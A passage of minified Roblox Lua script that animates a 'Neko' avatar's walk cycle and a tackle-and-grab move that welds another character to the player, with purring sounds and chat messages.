00001,0,0,-1,-0.0871555507,0.99619472,0,0.99619472,0.0871555507,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.0871553868,0.99619478,0,0.99619478,0.0871553868),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.100000001,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)end end end end;function WalkAnimation()lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,-.01)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,0)lerpintensity=0.2;Character.Humanoid.WalkSpeed=10;while true do if walking==false or action==true or running==true then break end;for T=1,40 do wait()if walking==false or action==true or running==true then return end;if T<10 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.11069298,0.00284805149,-0.0113444775,-0.0275930464,0.999554873,-0.995644093,-0.0922008753,-0.0138453478,0.0925418735,-0.99535799,-0.0264268741),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998093,0.914716721,0.236166,0,0,-0.99999994,0.642787814,0.766044438,0,0.766044438,-0.642787814,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.400000006,0.826279819,0.296199441,-0.107509531,0.0554968752,0.992653906,-0.990255713,-0.0948712975,-0.10194578,0.0885166675,-0.993941426,0.0651556775),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.731063485,0.174592972,0.0667652488,-0.0560226068,-0.99619472,0.500505805,0.865601063,-0.015134437,0.863155007,-0.49759084,0.0858316869),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-1.90734863e-06,0.690120697,0.826452255,-0.99619472,0,0.087155737,0.0225575455,-0.965925872,0.257833958,0.0841859803,0.258818835,0.962250233),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.984807789,0.167731062,-0.0449433662,0.0868238732,-0.251481235,0.963959992,0.150383621,-0.953217447,-0.26222375),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)if T==1 then walksound:Play()end elseif T<20 and T>=10 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.499998093,1.11069322,0.00284767151,0.00104822312,-0.0373455919,0.99930197,-0.985693932,0.168385059,0.00732677151,-0.168541074,-0.985013485,-0.0366348289),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499996185,1.10000134,0,-0.00256139738,0.00549332425,-0.999981701,0.996196687,0.0871093869,-0.00207318831,0.0870963484,-0.996183634,-0.00569554931),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.499996185,0.726279974,0.296193689,0.0230207816,0.0737333521,0.997012854,-0.939751029,0.341840804,-0.00358191691,-0.341083586,-0.936860859,0.0771604925),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.384763718,0.632380009,0.257478714,-0.0835437849,-0.0496501997,-0.995266914,0.936419606,0.337650985,-0.0954484046,0.340791643,-0.939961255,0.0182848126),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-1.90734863e-06,0.690116882,0.826450348,-0.99984777,0,0.0174524188,0.00451701321,-0.965925872,0.258779436,0.0168577358,0.258818835,0.965778768),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.999999881,-0.000320188352,-0.00100398809,0.000883448869,-0.264579654,0.964363515,-0.000574578531,-0.964363813,-0.264579356),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>20 and T<=30 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.11069298,0.00284805149,-0.0113444775,-0.0275930464,0.999554873,-0.822192252,0.569173992,0.006380721,-0.569096625,-0.821753919,-0.0291437767),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998093,1.10000169,-1.91479921e-06,0,0,-0.99999994,0.965925753,-0.258819461,0,-0.258819461,-0.965925753,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.726279795,0.196199447,0.0667652041,0.0560225844,0.99619472,-0.573830307,0.818938911,-0.00759609137,-0.816248238,-0.571139574,0.0868240744),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.400000006,0.831063449,0.274592996,-0.0969493613,0.00382048264,-0.995281994,0.93431288,-0.344288349,-0.0923319981,-0.343016714,-0.938856363,0.0298090242),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.69011879,0.826451302,-0.99619472,0,-0.087155737,-0.0225575455,-0.965925872,0.257833958,-0.0841859803,0.258818835,0.962250233),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.939692616,-0.330366075,0.0885212496,-0.171009839,-0.229692325,0.958121657,-0.296198249,-0.915477872,-0.272336036),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)if T==21 then walksound:Play()end else RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.499998093,1.11069322,0.00284767151,0.00104822312,-0.0373455919,0.99930197,-0.985693932,0.168385059,0.00732677151,-0.168541074,-0.985013485,-0.0366348289),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499996185,1.10000134,0,-0.00256139738,0.00549332425,-0.999981701,0.996196687,0.0871093869,-0.00207318831,0.0870963484,-0.996183634,-0.00569554931),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.499996185,0.726279974,0.296193689,0.0230207816,0.0737333521,0.997012854,-0.939751029,0.341840804,-0.00358191691,-0.341083586,-0.936860859,0.0771604925),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.384763718,0.632380009,0.257478714,-0.0835437849,-0.0496501997,-0.995266914,0.936419606,0.337650985,-0.0954484046,0.340791643,-0.939961255,0.0182848126),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-1.90734863e-06,0.690116882,0.826450348,-0.99984777,0,0.0174524188,0.00451701321,-0.965925872,0.258779436,0.0168577358,0.258818835,0.965778768),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.999999881,-0.000320188352,-0.00100398809,0.000883448869,-0.264579654,0.964363515,-0.000574578531,-0.964363813,-0.264579356),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end end end;function Tackle()lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,-.01)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,0)local lz=1;local lA=0;grabbed=false;running=false;local lB=nil;if action==true or freefall==true then return else action=true;lerpintensity=0.2 end;Character.Humanoid.JumpPower=0;Character.Humanoid.WalkSpeed=35;local lC;local function lD(ec)if ec.Parent:FindFirstChildOfClass("Humanoid")then grabbed=true;slave=ec.Parent;if ec.Parent:FindFirstChild("Torso")then lB=ec.Parent.Torso else lB=ec.Parent.UpperTorso end;lC:Disconnect()end end;lC=Character["Left Arm"].Touched:Connect(lD)local lE;local function lD(ec)if ec.Parent:FindFirstChildOfClass("Humanoid")then grabbed=true;if ec.Parent:FindFirstChild("Torso")then lB=ec.Parent.Torso else lB=ec.Parent.UpperTorso end;lE:Disconnect()end end;lE=Character["Right Arm"].Touched:Connect(lD)coroutine.resume(coroutine.create(function()repeat wait(0.1)lA=lA+0.1 until lA>=lz or grabbed==true;if lA>=lz then action=false;Character.Humanoid.WalkSpeed=10;Character.Humanoid.JumpPower=jumppower;lC:Disconnect()lE:Disconnect()if GunEquipped==true then if running==true then spawn(GunRunAnimation)elseif walking==true and running==false then spawn(GunWalkAnimation)elseif walking==false then spawn(GunIdleAnimation)end elseif GunEquipped==false then if walking==true then spawn(WalkAnimation)elseif walking==false then spawn(IdleAnimation)end end end end))Ring:Clone().Parent=Character.Torso;Character.Torso.Ring.CFrame=CFrame.new(Character.Torso.Position.X,Character.Torso.Position.Y,Character.Torso.Position.Z)*CFrame.new(0,-2.3,0)*CFrame.Angles(math.rad(90),0,0)local aj={}aj.Scale=Vector3.new(10,10,1)local lF=TweenInfo.new(0.6,Enum.EasingStyle.Quad,Enum.EasingDirection.Out)local lG=TweenService:Create(Character.Torso.Ring.Mesh,lF,aj)Character.Torso.Ring.Transparency=1;lG:Play()aj.Scale=nil;aj.Transparency=1;local lH=TweenService:Create(Character.Torso.Ring,lF,aj)lH:Play()DashJump:Play()lH.Completed:Connect(function()pcall(function()Character.Torso.Ring:Destroy()end)end)repeat wait()RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.50000012,0,1.29377966e-08,-0.173648164,0.984807789,7.33739043e-08,-0.984807789,-0.173648164,1,7.4505806e-08,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998093,1.50000024,0,-5.17511856e-09,0.173648164,-0.984807789,2.93495592e-08,-0.984807789,-0.173648164,-1,-2.98023224e-08,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0.087155737,0.99619472,0,0.99619472,-0.087155737,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,-0.087155737,-0.99619472,0,0.99619472,-0.087155737,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.700000048,0,-1,0,0,0,1,4.47034836e-08,0,4.47034836e-08,-1),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-0.99999994,0,0,0,-0.996194661,0.0871559232,0,0.0871559158,0.99619472),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,-0.573576331,0.819152117,0,-0.819152117,-0.573576331),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)until action==false or grabbed==true;if action==false then return end;if grabbed==true then Grab:Play()local lI=Instance.new("Motor6D")lI.Name="Hugging"lI.C1=CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1)lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)lI.Part0=Character.Torso;lI.Part1=lB;lI.Parent=Character.Torso;lB.Parent:FindFirstChildOfClass("Humanoid").PlatformStand=true;Character.Humanoid.WalkSpeed=10;for T=1,5 do wait()RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.573576093,-0.819152355,1.11758709e-08,0.816035211,-0.571393609,0.0871557295),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.573576033,-0.819152415,5.58793545e-08,-0.816035271,-0.571393549,0.087155737),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,-0.0113969073,0.0511440039,0.998626411,0.0852660537,0.995103419,-0.0499904603,-0.996293128,0.0845791027,-0.0157019645),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,-0.0113969073,-0.0511439741,-0.998626411,-0.0852655172,0.995103478,-0.0499904566,0.996293187,0.0845785663,-0.015701957),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.819152117,0.573576331,0,0.573576331,-0.819152117),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.984807611,-0.173649192,0,-0.173649192,0.984807611),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.0871561915,0.996194601,0,-0.996194601,0.0871561915),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end;lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)BodyFall:Play()for T=1,5 do wait()if T<=3 then lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.573576093,-0.819152355,1.11758709e-08,0.816035211,-0.571393609,0.0871557295),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.573576033,-0.819152415,5.58793545e-08,-0.816035271,-0.571393549,0.087155737),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,-0.0113969073,0.0511440039,0.998626411,0.0852660537,0.995103419,-0.0499904603,-0.996293128,0.0845791027,-0.0157019645),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,-0.0113969073,-0.0511439741,-0.998626411,-0.0852655172,0.995103478,-0.0499904566,0.996293187,0.0845785663,-0.015701957),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.819152117,0.573576331,0,0.573576331,-0.819152117),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.984807611,-0.173649192,0,-0.173649192,0.984807611),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.0871561915,0.996194601,0,-0.996194601,0.0871561915),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)else RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.573576093,-0.819152355,1.11758709e-08,0.816035211,-0.571393609,0.0871557295),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.573576033,-0.819152415,5.58793545e-08,-0.816035271,-0.571393549,0.087155737),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,-0.0113969073,0.0511440039,0.998626411,0.0852660537,0.995103419,-0.0499904603,-0.996293128,0.0845791027,-0.0157019645),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,-0.0113969073,-0.0511439741,-0.998626411,-0.0852655172,0.995103478,-0.0499904566,0.996293187,0.0845785663,-0.015701957),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.819152117,0.573576331,0,0.573576331,-0.819152117),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.984807611,-0.173649192,0,-0.173649192,0.984807611),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.0871561915,0.996194601,0,-0.996194601,0.0871561915),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end;lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)Character.Humanoid.WalkSpeed=0;lerpintensity=0.1;repeat local lJ=math.random(1,10)if lJ<10 then for T=1,30 do wait()if T<5 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925694,-0.25881952,0,0.25881952,0.965925694),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=5 and T<10 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=10 and T<15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925694,-0.25881952,0,0.25881952,0.965925694),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=15 and T<20 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=20 and T<25 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925694,-0.25881952,0,0.25881952,0.965925694),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=25 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end;if T>15 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.816035151,0.571393549,-0.087155737,-0.573576152,-0.819152236,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.816034973,0.571393907,-0.087155737,0.57357651,-0.819152057,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,0.07547912,0.0435778312,0.996194839,0.862730265,0.498097062,-0.087155737,-0.499999672,0.866025746,1.58324838e-08),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.862730086,0.498097271,-0.0871557519,0.499999851,0.866025507,1.62981451e-08),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.642787695,0.766044319,0,0.766044319,0.642787695),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.342020512,0.939692497,0,0.939692497,0.342020512),lerpintensity)end;lI.C0=lI.C0:Lerp(CFrame.new(-0.0227355957,-1.26026344,-1.37898636,-1,0,0,0,0.573576629,-0.819151938,0,-0.819151938,-0.573576629),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.39999998,-0.100000001,-0.0713938177,0.0499904528,0.99619472,-0.96299684,0.25676772,-0.0818995982,-0.259884864,-0.965179384,0.0298090167),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.40000141,-0.100001909,-0.0713938028,-0.0499904826,-0.99619472,0.962996662,0.256768346,-0.0818996057,0.25988543,-0.965179324,0.0298089981),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.42628178,0.0961997509,0.07547912,0.0435778312,0.996194839,0.639691591,0.76425612,-0.0818996131,-0.764916778,0.643439114,0.0298089981),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.431063563,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.639691174,0.764256358,-0.0818996206,0.764917135,0.643438578,0.0298090223),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.707106829,0.70710665,0,0.70710665,0.707106829),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.573576629,0.819151938,0,0.819151938,0.573576629),lerpintensity)end else local lK=math.random(1,2)if lK==1 then SmallSquish:Play()else BigSquish:Play()end;lerpintensity=0.2;for T=1,7 do wait()if T>3 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)else TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925932,0.258818567,0,-0.258818567,0.965925932),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end;lI.C0=lI.C0:Lerp(CFrame.new(-0.0227355957,-1.26026344,-1.37898636,-1,0,0,0,0.573576629,-0.819151938,0,-0.819151938,-0.573576629),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.39999998,-0.100000001,-0.0713938177,0.0499904528,0.99619472,-0.96299684,0.25676772,-0.0818995982,-0.259884864,-0.965179384,0.0298090167),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.40000141,-0.100001909,-0.0713938028,-0.0499904826,-0.99619472,0.962996662,0.256768346,-0.0818996057,0.25988543,-0.965179324,0.0298089981),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.42628178,0.0961997509,0.07547912,0.0435778312,0.996194839,0.639691591,0.76425612,-0.0818996131,-0.764916778,0.643439114,0.0298089981),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.431063563,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.639691174,0.764256358,-0.0818996206,0.764917135,0.643438578,0.0298090223),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.707106829,0.70710665,0,0.70710665,0.707106829),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.573576629,0.819151938,0,0.819151938,0.573576629),lerpintensity)end end until on=="more"or on=="false"lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,-.01)local lo=false;purring:Play()repeat if on=="false"then break end;if lo==false then lo=true;coroutine.resume(coroutine.create(function()local lx={[1]="lul [Neko]: prrrrrrrrrrrr...",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end))else coroutine.resume(coroutine.create(function()Talk("prrrrrrrrrrrr...")end))end;lerpintensity=0.15;for T=1,15 do wait()if T<=7 then if T==1 then brushsound:Play()local lJ=math.random(8,13)purring.PlaybackSpeed=lJ/10 end;lI.C0=lI.C0:Lerp(CFrame.new(0.0583114624,-0.512584686,-1.41906452,-0.99619472,0,-0.087155737,0.0298089981,0.939692736,-0.340718448,0.0818996131,-0.342019916,-0.936116934),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.438678026,0.680997431,0.586348057,-0.474547088,-0.378539503,0.794677913,0.763129473,-0.626857519,0.157108307),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.300007641,0.600003064,-0.100000381,-0.230375499,0.115933135,0.966171086,-0.934927404,0.249000192,-0.252803802,-0.269885123,-0.961539626,0.0510255098),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.273846447,0.619167328,-0.0977859497,-0.389224023,-0.157410368,-0.907593906,0.880719543,0.225086316,-0.41673708,0.269885838,-0.961539865,0.051025331),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.497009277,-0.173597336,0.196154714,0.0262007248,-0.0151497796,0.999542058,0.343312234,0.939207077,0.00523614883,-0.938855946,0.343017817,0.0298089981),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.497009277,-0.168815613,0.174548149,0.0854182094,-0.148172021,-0.98526603,-0.33354643,0.927569389,-0.16841206,0.938856184,0.34301731,0.0298090223),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0.200912476,-0.709360123,0.458553314,-0.800952435,0.101351067,0.590087712,0.368687898,-0.693053365,0.619472563,0.471746415,0.713726521,0.517735839),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0.298843384,0.105287552,1.00426102,-0.99619472,0,0.087155737,0.0298089981,-0.939692736,0.340718448,0.0818996131,0.342019916,0.936116934),lerpintensity)else if T==8 then brushsound:Play()end;lI.C0=lI.C0:Lerp(CFrame.new(0.195236206,-0.504997253,-1.39821768,-0.99619472,0,0.087155737,-0.0298089981,0.939692736,-0.340718448,-0.0818996131,-0.342019916,-0.936116934),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.300018311,0.600002289,-0.100000381,-0.386793852,0.164786592,0.90732348,-0.880415916,0.226710796,-0.416497767,-0.274333209,-0.959920764,0.0573903918),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.273849487,0.619165421,-0.0977859497,-0.232747033,-0.108718231,-0.966441572,0.935460567,0.246745914,-0.253043085,0.265976012,-0.962962985,0.0442721732),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.497024536,-0.173601151,0.196154594,0.116779052,0.226236105,0.967047155,0.343777001,0.904307723,-0.25307247,-0.93176204,0.362002134,0.0278293937),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.497009277,-0.168815613,0.174548388,0.0265306477,0.0151176825,-0.999533892,-0.347999454,0.937482119,0.00494225696,0.937119603,0.347706079,0.0301329084),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0.570289612,-0.803970337,-0.0138549805,0.00520382822,0.624937713,0.78065753,-0.286788315,-0.746941745,0.59985894,0.957979977,-0.22700496,0.175337881),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.11423111,1.02883196,-0.99619472,0,-0.087155737,-0.0298089981,-0.939692736,0.340718448,-0.0818996131,0.342019916,0.936116934),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.9468472,-0.225056857,0.229848579,-0.193389788,0.172739729,0.965796232,-0.257062763,-0.95891124,0.120034307),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end until on=="false"coroutine.resume(coroutine.create(function()local lx={[1]="lol [Neko]: -w-",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end))purring:Stop()for T=1,5 do wait()RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.816035151,0.571393549,-0.087155737,-0.573576152,-0.819152236,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.816034973,0.571393907,-0.087155737,0.57357651,-0.819152057,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,0.07547912,0.0435778312,0.996194839,0.862730265,0.498097062,-0.087155737,-0.499999672,0.866025746,1.58324838e-08),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.862730086,0.498097271,-0.0871557519,0.499999851,0.866025507,1.62981451e-08),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.642787695,0.766044319,0,0.766044319,0.642787695),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.